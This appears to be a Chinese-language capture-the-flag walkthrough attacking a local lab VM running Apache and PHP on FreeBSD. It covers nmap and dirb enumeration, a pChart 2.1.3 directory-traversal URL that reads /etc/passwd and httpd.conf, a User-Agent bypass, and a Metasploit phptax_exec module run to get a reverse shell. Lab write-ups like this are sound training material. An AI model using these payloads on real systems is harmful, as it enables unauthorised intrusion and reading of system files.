靶机IP:192.168.1.159
kaliIP:192.168.1.128
先用nmap看看情况
sudo nmap --min-rate 10000 -p- 192.168.1.159
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-13 13:50 CST
Nmap scan report for bogon (192.168.1.159)
Host is up (0.00023s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
8080/tcp open http-proxy
再看看详细情况
sudo nmap -A -p22,80,8080 192.168.1.159
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-13 13:52 CST
Nmap scan report for bogon (192.168.1.159)
Host is up (0.00043s latency).
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:FD:5C:9F (VMware)
Device type: firewall|general purpose|VoIP adapter|VoIP phone
Running (JUST GUESSING): Fortinet embedded (89%), OpenBSD 4.X|5.X (88%), Vonage embedded (88%), FreeBSD 10.X (86%), Polycom embedded (86%)
OS CPE: cpe:/o:openbsd:openbsd:4.0 cpe:/h:vonage:v-portal cpe:/o:freebsd:freebsd:10.3 cpe:/o:openbsd:openbsd:5.9 cpe:/h:polycom:soundpoint_ip_331
Aggressive OS guesses: Fortinet FortiGate-50B or 310B firewall (89%), OpenBSD 4.0 (88%), Vonage V-Portal VoIP adapter (88%), Fortinet FortiGate 100D firewall (86%), Fortinet FortiGate 1500D firewall (86%), FreeBSD 10.3-RELEASE (86%), OpenBSD 5.9 (86%), Polycom SoundPoint IP 331 VoIP phone (86%), Fortinet FortiGate-60B or -100A firewall (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms bogon (192.168.1.159)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.31 seconds
访问端口看看,80允许访问,8080无权限,web架构和nmap扫描结果相同
看目录
sudo dirb http://192.168.1.159
+ http://192.168.1.159/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.1.159/index.html (CODE:200|SIZE:152)
cgi-bin的目录也需要权限,看网页源代码发现关键词
<!--
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
-->
查询pChart2.1.3发现有文件包含,拼接后发现成功
http://localhost/pChart2.1.3/examples/index.php/?Action=View&Script=/../../../etc/passwd
查看apache服务器的配置
In FreeBSD, the main Apache HTTP Server configuration file is installed as /usr/local/etc/apache2 x /httpd.conf, where x represents the version number. Thisl ASCII text file begins comment lines with a # . The most frequently modified directives are: ServerRoot "/usr/local"
在FreeBSD中,主要的Apache HTTP服务器配置文件安装为/usr/local/etc/apache2 x /httpd.conf,其中x代表版本号。这个ASCII文本文件的注释行以#开始。最常被修改的指令是:ServerRoot "/usr/local"
http://localhost/pChart2.1.3/examples/index.php/?Action=View&Script=/../../../usr/local/etc/apache22/httpd.conf
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
发现8080端口限制user-agent,使用火狐扩展User-Agent Switcher工具持续修改,
访问
http://localhost:8080
发现新的文件夹,点击为一张图片,搜索一下相关信息
http://localhost/phptax/
可以用msf打,搜索一下,模块为multi/http/phptax_exec
设置好后直接run,反向连接到主机。